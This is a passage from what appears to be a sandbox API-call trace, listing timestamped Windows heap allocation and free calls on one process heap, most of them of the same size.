returned 0x2312180 [0295.703] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2f0) returned 0x458b20 [0295.703] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0295.703] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2325390 [0295.704] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23385a0 [0295.704] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x234b7b0 [0295.705] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x235e9c0 [0295.705] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2371bd0 [0295.705] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2384de0 [0295.706] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2397ff0 [0295.706] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23ab200 [0295.707] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23be410 [0295.707] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23d1620 [0295.708] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23e4830 [0295.708] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23f7a40 [0295.709] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x240ac50 [0295.710] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x241de60 [0295.710] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2431070 [0295.711] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2444280 [0295.711] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2457490 [0295.711] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x246a6a0 [0295.712] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x247d8b0 [0295.713] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2490ac0 [0295.713] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24a3cd0 [0295.713] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24b6ee0 [0295.714] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24ca0f0 [0295.714] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24dd300 [0295.715] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24f0510 [0295.715] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2503720 [0295.715] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) Thread: id = 238 os_tid = 0x774